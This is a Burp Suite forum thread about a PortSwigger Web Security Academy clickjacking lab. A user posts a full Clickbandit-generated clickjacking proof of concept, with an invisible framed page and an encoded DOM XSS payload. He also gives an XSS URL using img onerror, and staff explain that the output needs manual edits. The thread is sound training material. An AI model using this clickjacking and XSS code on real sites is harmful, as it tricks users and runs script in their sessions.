Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS does not work correctly

Александр | Last updated: Mar 17, 2023 07:07PM UTC

Hi! A correct POC (generated by Burp Clickbandit, tested in Chromium Version 111.0.5563.64 (Official Build) (arm64)) does not solve the lab. https://portswigger.net/web-security/clickjacking/lab-exploiting-to-trigger-dom-based-xss

Ben, PortSwigger Agent | Last updated: Mar 21, 2023 07:47AM UTC

Hi, Are you able to supply us with the details of your POC?

Александр | Last updated: Mar 23, 2023 04:25PM UTC

Sorry for the delay. The code: <div id="container" style="clip-path: inset(200px 360px 233px 200px); clip: rect(200px, 360px, 233px, 200px); overflow: hidden; position: absolute; left: 0px; top: 0px; width: 100%; height: 100%;"> <!-- Clickjacking PoC Generated by Burp Suite Professional --> <input id="clickjack_focus" style="opacity:0;position:absolute;left:-5000px;"> <div id="clickjack_button" style="opacity: 1; transform-style: preserve-3d; text-align: center; font-family: Arial; font-size: 100%; width: 160px; height: 33px; z-index: 0; background-color: red; color: rgb(255, 255, 255); position: absolute; left: 200px; top: 200px;"><div style="position:relative;top: 50%;transform: translateY(-50%);">Click</div></div> <!-- Show this element when clickjacking is complete --> <div id="clickjack_complete" style="display:none;-webkit-transform-style: preserve-3d;-moz-transform-style: preserve-3d;transform-style: preserve-3d;font-family:Arial;font-size:16pt;color:red;text-align:center;width:100%;height:100%;"><div style="position:relative;top: 50%;transform: translateY(-50%);">You've been clickjacked!</div></div> <iframe id="parentFrame" src="data:text/html;base64,PHNjcmlwdD53aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigibWVzc2FnZSIsIGZ1bmN0aW9uKGUpeyB2YXIgZGF0YSwgY2hpbGRGcmFtZSA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjaGlsZEZyYW1lIik7IHRyeSB7IGRhdGEgPSBKU09OLnBhcnNlKGUuZGF0YSk7IH0gY2F0Y2goZSl7IGRhdGEgPSB7fTsgfSBpZighZGF0YS5jbGlja2JhbmRpdCl7IHJldHVybiBmYWxzZTsgfSBjaGlsZEZyYW1lLnN0eWxlLndpZHRoID0gZGF0YS5kb2NXaWR0aCsicHgiO2NoaWxkRnJhbWUuc3R5bGUuaGVpZ2h0ID0gZGF0YS5kb2NIZWlnaHQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLmxlZnQgPSBkYXRhLmxlZnQrInB4IjtjaGlsZEZyYW1lLnN0eWxlLnRvcCA9IGRhdGEudG9wKyJweCI7fSwgZmFsc2UpOzwvc2NyaXB0PjxpZnJhbWUgc3JjPSJodHRwczovLzBhNmMwMGM1MDMzNjE3YThjMmI5NTNiYTAwMjAwMGUxLndlYi1zZWN1cml0eS1hY2FkZW15Lm5ldC9mZWVkYmFjaz9uYW1lPSYjMzc7M0NpbWcmIzM3OzIwc3JjPTEmIzM3OzIwb25lcnJvcj1hbGVydCYjNDA7MSYjNDE7JiMzNzszRSYjMzg7ZW1haWw9dGVzdCYjNjQ7dGVzdC5jb20mIzM4O3N1YmplY3Q9MSYjMzg7bWVzc2FnZT0xIiBzY3JvbGxpbmc9Im5vIiBzdHlsZT0id2lkdGg6MTQ0MHB4O2hlaWdodDo5MjNweDtwb3NpdGlvbjphYnNvbHV0ZTtsZWZ0OjUwcHg7dG9wOi02MjNweDtib3JkZXI6MDsiIGZyYW1lYm9yZGVyPSIwIiBpZD0iY2hpbGRGcmFtZSIgb25sb2FkPSJwYXJlbnQucG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoe2NsaWNrYmFuZGl0OjF9KSwnKicpIj48L2lmcmFtZT4=" frameborder="0" scrolling="no" style="transform: scale(1); transform-origin: 200px 200px; opacity: 0.0001; border: 0px; position: absolute; z-index: 1; width: 1440px; height: 923px; left: 0px; top: 0px;"></iframe> </div> <script>function findPos(obj) { var left = 0, top = 0; if(obj.offsetParent) { while(1) { left += obj.offsetLeft; top += obj.offsetTop; if(!obj.offsetParent) { break; } obj = obj.offsetParent; } } else if(obj.x && obj.y) { left += obj.x; top += obj.y; } return [left,top]; }function generateClickArea(pos) { var elementWidth, elementHeight, x, y, parentFrame = document.getElementById('parentFrame'), desiredX = 200, desiredY = 200, parentOffsetWidth, parentOffsetHeight, docWidth, docHeight, btn = document.getElementById('clickjack_button'); if(pos < window.clickbandit.config.clickTracking.length) { clickjackCompleted(false); elementWidth = window.clickbandit.config.clickTracking[pos].width; elementHeight = window.clickbandit.config.clickTracking[pos].height; btn.style.width = elementWidth + 'px'; btn.style.height = elementHeight + 'px'; window.clickbandit.elementWidth = elementWidth; window.clickbandit.elementHeight = elementHeight; x = window.clickbandit.config.clickTracking[pos].left; y = window.clickbandit.config.clickTracking[pos].top; docWidth = window.clickbandit.config.clickTracking[pos].documentWidth; docHeight = window.clickbandit.config.clickTracking[pos].documentHeight; parentOffsetWidth = desiredX - x; parentOffsetHeight = desiredY - y; parentFrame.style.width = docWidth+'px'; parentFrame.style.height = docHeight+'px'; parentFrame.contentWindow.postMessage(JSON.stringify({clickbandit: 1, docWidth: docWidth, docHeight: docHeight, left: parentOffsetWidth, top: parentOffsetHeight}),'*'); calculateButtonSize(getFactor(parentFrame)); showButton(); if(parentFrame.style.opacity === '0') { calculateClip(); } } else { resetClip(); hideButton(); clickjackCompleted(true); } }function hideButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 0; }function showButton() { var btn = document.getElementById('clickjack_button'); btn.style.opacity = 1; }function clickjackCompleted(show) { var complete = document.getElementById('clickjack_complete'); if(show) { complete.style.display = 'block'; } else { complete.style.display = 'none'; } }window.addEventListener("message", function handleMessages(e){ var data; try { data = JSON.parse(e.data); } catch(e){ data = {}; } if(!data.clickbandit) { return false; } showButton(); },false);window.addEventListener("blur", function(){ if(window.clickbandit.mouseover) { hideButton();setTimeout(function(){ generateClickArea(++window.clickbandit.config.currentPosition);document.getElementById("clickjack_focus").focus();},1000); } }, false);document.getElementById("parentFrame").addEventListener("mouseover",function(){ window.clickbandit.mouseover = true; }, false);document.getElementById("parentFrame").addEventListener("mouseout",function(){ window.clickbandit.mouseover = false; }, false);</script><script>window.clickbandit={mode: "review", mouseover:false,elementWidth:160,elementHeight:33,config:{"clickTracking":[{"width":160,"height":33,"mouseX":220,"mouseY":836,"left":150,"top":823,"documentWidth":1440,"documentHeight":923}],"currentPosition":0}};function calculateClip() { var btn = document.getElementById('clickjack_button'), w = btn.offsetWidth, h = btn.offsetHeight, container = document.getElementById('container'), x = btn.offsetLeft, y = btn.offsetTop; container.style.overflow = 'hidden'; container.style.clip = 'rect('+y+'px, '+(x+w)+'px, '+(y+h)+'px, '+x+'px)'; container.style.clipPath = 'inset('+y+'px '+(x+w)+'px '+(y+h)+'px '+x+'px)'; }function calculateButtonSize(factor) { var btn = document.getElementById('clickjack_button'), resizedWidth = Math.round(window.clickbandit.elementWidth * factor), resizedHeight = Math.round(window.clickbandit.elementHeight * factor); btn.style.width = resizedWidth + 'px'; btn.style.height = resizedHeight + 'px'; if(factor > 100) { btn.style.fontSize = '400%'; } else { btn.style.fontSize = (factor * 100) + '%'; } }function resetClip() { var container = document.getElementById('container'); container.style.overflow = 'visible'; container.style.clip = 'auto'; container.style.clipPath = 'none'; }function getFactor(obj) { if(typeof obj.style.transform === 'string') { return obj.style.transform.replace(/[^\d.]/g,''); } if(typeof obj.style.msTransform === 'string') { return obj.style.msTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.MozTransform === 'string') { return obj.style.MozTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.oTransform === 'string') { return obj.style.oTransform.replace(/[^\d.]/g,''); } if(typeof obj.style.webkitTransform === 'string') { return obj.style.webkitTransform.replace(/[^\d.]/g,''); } return 1; }</script>

Ben, PortSwigger Agent | Last updated: Mar 24, 2023 11:09AM UTC

Hi Alexander, Just to clarify a couple of things, does your exploit have a div element located over the underlying 'Submit Feedback' button that is called 'Click me'? And does your exploit trigger the print() function?

Александр | Last updated: Mar 24, 2023 10:10PM UTC

Hi, I use the following url: https://0ab10050033828c4c0cb7cbd00c500a3.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&email=test@test&subject=1&message=1

Ben, PortSwigger Agent | Last updated: Mar 28, 2023 12:36PM UTC

Hi Alexander, Speaking to the guys that both wrote Clickbandit and develop the Web Academy, you should be able to use Clickbandit to solve these labs but you would need to manually edit the output in order to comply with the requirements of the individual labs. Unfortunately, providing specific guidance for getting this approach to work is beyond the level of support that we can offer within the Web Academy.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.